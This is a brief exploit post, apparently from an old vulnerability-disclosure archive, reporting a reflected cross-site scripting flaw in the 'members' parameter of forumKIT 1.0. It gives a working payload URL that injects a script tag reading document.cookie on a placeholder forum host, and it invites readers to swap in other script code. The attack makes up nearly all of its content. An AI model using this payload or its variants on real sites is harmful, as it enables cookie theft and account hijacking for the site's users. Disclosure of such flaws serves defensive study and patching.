`
Vulnerable System :
forumKIT 1.0
Description :
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .
exploit :
http://forum.target.com/f.aspx?members="><script>alert(document.cookie);</script>
this exploit is discovered by : neO
e-mail : [email protected]
`